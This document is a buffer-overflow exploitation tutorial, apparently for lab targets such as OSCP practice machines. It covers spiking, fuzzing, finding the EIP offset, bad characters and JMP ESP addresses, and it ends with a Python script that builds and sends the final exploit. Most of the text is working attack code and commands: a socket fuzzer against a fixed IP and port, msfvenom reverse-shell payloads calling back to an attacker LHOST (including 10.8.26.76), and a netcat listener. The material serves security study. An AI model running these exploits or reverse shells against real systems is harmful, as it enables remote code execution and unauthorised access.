Buffer Overflow

Spiking

nc -nv IP PORT

Connect, find the commands the service accepts, then spike each command to find the one that crashes the process (attach the process in Immunity Debugger first so the crash is visible):

generic_send_tcp HOST PORT stats.spk 0 0

stats.spk is a SPIKE template that sends one command followed by a fuzzed string; the two trailing zeros are the SKIPVAR and SKIPSTR counters used to resume an interrupted run.

Fuzzing

#!/usr/bin/env python3
import socket
import sys

# Target from the original script; change to the host/port found while spiking.
ip, port = '10.10.153.41', 31337
# Prefix with the vulnerable command (e.g. b"STATS ") if spiking pointed at one.
prefix = b""

# Build strings of 100, 200, ... 3000 bytes.
buffer = [b"A"]
counter = 100

while len(buffer) <= 30:
    buffer.append(b"A" * counter)
    counter = counter + 100

for string in buffer:
    print("Fuzzing with %d bytes" % len(string))
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((ip, port))
        s.send(prefix + string + b'\r\n')
        s.recv(1024)
        s.close()
    except (socket.timeout, ConnectionError) as e:
        # No answer, or connection refused/reset: the service has most likely crashed.
        # The previous length still worked, so the crash size is this one.
        print("Service crashed after sending %d bytes (%s)" % (len(string), e))
        sys.exit(0)

Finding the Offset

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l CRASHBYTES

(On Kali the same scripts are also on the PATH as msf-pattern_create and msf-pattern_offset.)

Copy the output and paste it into the buffer variable of the script in place of the "A" string, using the length at which the fuzzer crashed the service.

Run the script and note the value Immunity Debugger shows in EIP at the crash (Ex: 35724134).

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134

This prints the exact offset of those 4 bytes within the pattern.

Or using mona, after crashing the service with the pattern in the buffer:

!mona findmsp -distance CRASHBYTES

Overwrite the EIP

> [*] Exact match at offset 524

Great! Now our payload will be as follows: "A"*524 + "B"*4 + badchars. Run the updated script and confirm that EIP now reads 42424242 (the four "B"s) before going any further; if it does not, the offset is wrong.
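The two Metasploit scripts above implement a simple algorithm, and it is worth seeing it written out: the pattern is every upper-case letter, lower-case letter and digit combined as 3-byte groups (Aa0Aa1...Aa9Ab0...), which is unique for 20280 bytes, and the offset lookup is just a substring search after reversing the EIP value, because x86 is little-endian. The following is an added example, not code from the page or from Metasploit; the 35724134 value and the 524 result are the ones quoted above, and crash_buffer's prefix argument is an assumption for services that need a command in front of the data.

```python
#!/usr/bin/env python3
"""Cyclic pattern helpers that reproduce pattern_create.rb / pattern_offset.rb."""
import itertools

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGIT) * 3   # 20280 bytes before it repeats


def pattern_create(length):
    """Return `length` bytes of the Metasploit pattern: Aa0Aa1Aa2...Ab0Ab1..."""
    if length > MAX_PATTERN:
        raise ValueError("pattern longer than %d bytes would repeat" % MAX_PATTERN)
    out = []
    for u, l, d in itertools.product(UPPER, LOWER, DIGIT):
        out.append(u + l + d)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length].encode()


def pattern_offset(eip_value, length=MAX_PATTERN):
    """Offset of the 4 bytes found in EIP, or -1 if they are not in the pattern.

    eip_value is the register value as Immunity shows it (e.g. "35724134").
    x86 is little-endian, so the bytes that actually sat in that stack slot
    are the reverse of that hex string ("4Ar5" here).
    """
    raw = bytes.fromhex(eip_value.lower().replace("0x", "").zfill(8))
    pattern = pattern_create(length)
    offset = pattern.find(raw[::-1])
    if offset == -1:
        # Fall back to the big-endian reading, in case the value was copied from
        # a hex dump rather than from the register pane.
        offset = pattern.find(raw)
    return offset


def crash_buffer(crash_bytes, prefix=b""):
    """Buffer to send instead of the "A"*N string: optional command prefix + pattern."""
    return prefix + pattern_create(crash_bytes) + b"\r\n"


if __name__ == "__main__":
    print(pattern_create(30).decode())     # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9
    print(pattern_offset("35724134"))      # 524, matching the pattern_offset/mona output above
```

If pattern_offset returns -1 the value in EIP did not come from your pattern (for example the crash clobbered a different register first, or the buffer was longer than 20280 bytes), so check the registers again rather than guessing an offset.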

## Finding bad characters

badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

The list above deliberately starts at \x01: \x00 (the null byte) terminates C strings and truncates everything after it, so it is treated as bad from the start and is never sent. Do not drop any other byte (such as \x90, the NOP) in advance; every other value is tested like the rest and only removed if the dump shows it mangled.

Add badchars to the script right after the EIP overwrite ("A"*offset + "B"*4 + badchars).

In Immunity Debugger, right-click ESP and choose "Follow in Dump", then read the hex dump and see which values are missing or altered. ESP points at the first byte after the return address, so the dump should start with 01 02 03 ...

Remove the first bad char from the string, re-run the script and repeat the process until the whole sequence arrives intact.

Or, making use of mona, generate the same byte array (the -b list is the bytes already known to be bad):

!mona bytearray -b "\x00"

Run the script and take note of the memory address ESP points to at the crash. Then use it in the following command:

!mona compare -f C:\mona\oscp\bytearray.bin -a 0124FA18

(The .bin path depends on mona's working folder; set it with !mona config -set workingfolder c:\mona\%p.)

Not all of the bytes mona flags are necessarily bad! A bad char often corrupts the next byte, or truncates the rest of the string, so everything after it is reported as well. Remove only the first flagged byte, regenerate the array with it added to -b, and compare again; repeat until mona reports the array as unmodified.
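The comparison step above is easy to get wrong by removing too many bytes at once. The following added example (not code from the page or from mona) writes the loop down: generate the probe minus the known-bad bytes, diff it against what is read back at ESP, report only the first divergence, and repeat. The fake_service function is a constructed stand-in for the target that truncates at \x0a and rewrites \x0d, an assumption chosen to show why the second bad byte only becomes visible after the first one is removed.

```python
#!/usr/bin/env python3
"""Generate the bad-character probe and diff it against what landed in memory."""


def make_badchars(exclude=(0x00,)):
    """All byte values 0x00-0xff minus the ones already known to be bad.

    Mirrors `!mona bytearray -b "\\x00"`: \\x00 is left out by default because
    almost every string-handling routine stops at it.
    """
    return bytes(b for b in range(256) if b not in exclude)


def compare(sent, dumped):
    """Return the first byte of `sent` that does not appear intact in `dumped`.

    `dumped` is what you read back from the debugger starting at the address
    ESP points to. Only the FIRST mismatch is reported on purpose: a bad byte
    often corrupts or truncates everything after it, so the bytes that follow
    cannot be judged until it has been removed and the probe re-sent.
    Returns None when the whole probe arrived unmodified.
    """
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def find_badchars(send_and_dump, exclude=(0x00,)):
    """Iterate until the probe survives; returns the sorted list of bad bytes.

    send_and_dump(probe) must deliver `probe` after the EIP overwrite and return
    the bytes found at ESP. In practice that is you re-running the exploit and
    reading the dump, so this loop is just the manual procedure written down.
    """
    bad = list(exclude)
    while True:
        probe = make_badchars(bad)
        culprit = compare(probe, send_and_dump(probe))
        if culprit is None:
            return sorted(bad)
        bad.append(culprit)


# --- constructed target behaviour so the script runs offline (assumed) ----------
def fake_service(probe):
    """Pretend the target truncates at \\x0a and rewrites \\x0d as \\x20."""
    truncated = probe.split(b"\x0a")[0]
    return truncated.replace(b"\x0d", b"\x20")


if __name__ == "__main__":
    # First pass flags \x0a (everything after it is gone); only the second pass
    # can see that \x0d is rewritten too.
    print(["\\x%02x" % b for b in find_badchars(fake_service)])
```

The final list is what goes into msfvenom's -b option later; the encoder then guarantees the shellcode contains none of those bytes, but it cannot protect the return address, which you still have to check by hand.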

Finding the right ESP jump instruction

Copy mona.py from GitHub (corelan/mona) into the PyCommands folder of Immunity Debugger.

GitHub - corelan/mona: Corelan Repository for mona.py

In Immunity Debugger

!mona jmp -r esp

The results are written to the Log window (Window->Log data).

From this output pick a JMP ESP address from a module without ASLR/rebase (Ex: 080414C3). The address must be written little-endian in the payload, i.e. byte-reversed: 080414C3 --> c3140408, or "\xc3\x14\x04\x08" in the script. Also make sure none of its four bytes is a bad character.

Alternatively

In Immunity debugger

!mona modules

Pick a module attached to the process whose protections (Rebase, SafeSEH, ASLR, NXCompat) are all False (essdunc.dll in this case), so the address is the same on every run.

The opcode bytes for JMP ESP are FF E4 (confirm with /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb). With this information we can search the DLL for that instruction:

!mona find -s "\xff\xe4" -m essdunc.dll

Retrieve the candidate return addresses from the output and choose one that contains no bad characters.

Now we have our JMP ESP address, 311712F3 (this example uses an offset of 2003; substitute your own offset and address). Our payload will be as follows: "A" * 2003 + "\xf3\x12\x17\x31" + "\x90" * 32 + shellcode. The 32 \x90 NOPs form a sled in front of the shellcode, so the jump still lands in executable code if ESP is off by a few bytes, and they give an encoder's decoder stub room to work. Note that the JMP address is written byte-reversed (little-endian). Before adding shellcode, set a breakpoint (F2) on the JMP ESP address in Immunity and run the exploit to confirm execution reaches it.
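What `!mona find -s "\xff\xe4"` does is a byte search over the module image, followed by the two checks a practitioner applies by hand: the module must not move (no ASLR/rebase) and the address, once packed little-endian, must not contain a bad character. The following added example (not code from the page or from mona) performs the search and the packing; FAKE_IMAGE and FAKE_BASE are a constructed module, assumed to be mapped at 0x31170000, planted with three FF E4 sequences so that the 311712F3 address from the text is among the hits and one candidate is rejected for containing \x00.

```python
#!/usr/bin/env python3
"""Locate FF E4 (jmp esp) in a module image and pack the address for the EIP slot."""
import struct

JMP_ESP = b"\xff\xe4"   # opcode bytes for `jmp esp`, same as `!mona find -s "\xff\xe4"`


def find_jmp_esp(image, base, badchars=b"\x00"):
    """Virtual addresses of every `jmp esp` in `image`, a module loaded at `base`.

    Any candidate whose 4 little-endian bytes contain a bad character is dropped,
    because the address travels through the same vulnerable copy as the rest of
    the buffer. A hit may sit inside another instruction; that does not matter,
    since execution starts at the returned address, not at that instruction.
    """
    hits = []
    start = 0
    while True:
        idx = image.find(JMP_ESP, start)
        if idx == -1:
            return hits
        addr = base + idx
        if not any(b in badchars for b in struct.pack("<I", addr)):
            hits.append(addr)
        start = idx + 1


def pack_address(addr):
    """0x311712F3 -> b"\\xf3\\x12\\x17\\x31": x86 stores the dword little-endian."""
    return struct.pack("<I", addr)


# --- constructed module image so the script runs offline (assumed) --------------
FAKE_BASE = 0x31170000
FAKE_IMAGE = bytearray(b"\x90" * 0x3000)
FAKE_IMAGE[0x0100:0x0102] = JMP_ESP   # 0x31170100 -> packs to 00 01 17 31, unusable
FAKE_IMAGE[0x12F3:0x12F5] = JMP_ESP   # 0x311712F3, the address used in the text
FAKE_IMAGE[0x2A1B:0x2A1D] = JMP_ESP   # 0x31172A1B

if __name__ == "__main__":
    for a in find_jmp_esp(bytes(FAKE_IMAGE), FAKE_BASE):
        print("%08X -> \\x%s" % (a, "\\x".join(pack_address(a).hex()[i:i + 2] for i in range(0, 8, 2))))
```

Against a real target, `image` would be the module's bytes as mapped in the process (mona reads them from the debugger) and `base` its load address from `!mona modules`; a module with Rebase or ASLR set to True would give a different base on the next run and the address found here would be useless.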

## Generate shell code

Test by first trying to open the calculator; if calc.exe pops up on the target the whole chain works, independently of any network callback:

msfvenom -p windows/exec -b "\x00" -f python --var-name shellcode CMD=calc.exe EXITFUNC=thread

For Windows boxes:

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 EXITFUNC=thread -f python -a x86 -b "\x00\x0a"

For Linux box:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.8.26.76 LPORT=9001 -f c -a x86 --platform linux -b "\x00" -e x86/shikata_ga_nai

Pass every bad character found earlier in -b, otherwise the encoded shellcode may contain one and get mangled. Copy the payload result into the script. EXITFUNC=thread makes the shellcode terminate only its own thread, so the service keeps running after the shell closes. Note that linux/x86/shell/reverse_tcp is a staged payload and needs a Metasploit multi/handler to deliver the second stage; the stageless linux/x86/shell_reverse_tcp works with a plain nc listener.

Start the listener first, then run the exploit:

nc -nvlp 4444
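Putting the pieces together, the final script is the fuzzer's socket code with the crash string replaced by padding + return address + NOP sled + shellcode. The following is an added example, not code from the page: build_payload assembles that buffer and refuses to send a return address or shellcode that contains a bad character, which is the check people forget once msfvenom has encoded the shellcode. FAKE_SHELLCODE is a constructed stand-in (four INT3 breakpoints, so Immunity stops inside the sled) for the msfvenom output; the 2003/311712F3 values and the target address are the ones used earlier on the page, and the total argument is an assumption for services that only crash at one exact buffer length.

```python
#!/usr/bin/env python3
"""Assemble and deliver the final buffer: padding + jmp esp address + NOP sled + shellcode."""
import socket
import struct


def build_payload(offset, jmp_esp, shellcode, badchars=b"\x00", nops=32, prefix=b"", total=None):
    """Return the bytes to send.

    offset     distance to EIP found with pattern_offset / mona findmsp
    jmp_esp    address of a JMP ESP in a module without ASLR/rebase, as an int
    shellcode  msfvenom output (already encoded with -b for the same badchars)
    nops       \\x90 sled in front of the shellcode so a slightly-off ESP still lands in it
    prefix     command the service expects before the data, if any (not counted in offset)
    total      if set, pad the end so every send is as long as the crash buffer
    """
    ret = struct.pack("<I", jmp_esp)            # little-endian, e.g. 0x311712F3 -> f3 12 17 31
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        bad = sorted({b for b in blob if b in badchars})
        if bad:
            raise ValueError("%s contains bad characters: %s"
                             % (name, ["\\x%02x" % b for b in bad]))
    payload = prefix + b"A" * offset + ret + b"\x90" * nops + shellcode
    if total is not None:
        if len(payload) > total:
            raise ValueError("payload (%d) longer than the crash buffer (%d)"
                             % (len(payload), total))
        payload += b"C" * (total - len(payload))   # filler; never executed when the jump works
    return payload + b"\r\n"


def send_payload(host, port, payload, timeout=5):
    """Deliver the buffer; the listener (nc -nvlp 4444) must already be running."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.send(payload)


# Constructed stand-in for msfvenom's buf: INT3 x4 makes the debugger break inside the
# sled instead of running a real reverse shell. Replace with the real encoded shellcode.
FAKE_SHELLCODE = b"\xcc" * 4

if __name__ == "__main__":
    buf = build_payload(2003, 0x311712F3, FAKE_SHELLCODE)
    print("sending %d bytes" % len(buf))
    send_payload("10.10.153.41", 31337, buf)   # target from the fuzzer above
```

Run it once with the INT3 stand-in while attached in Immunity: a break at ESP+0 to ESP+35 proves the offset, the return address and the sled are right, and only then is it worth swapping in the reverse shell and starting nc.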

Additional reading

dostackbufferoverflowgood/dostackbufferoverflowgood_tutorial.pdf at master · justinsteven/dostackbufferoverflowgood · GitHub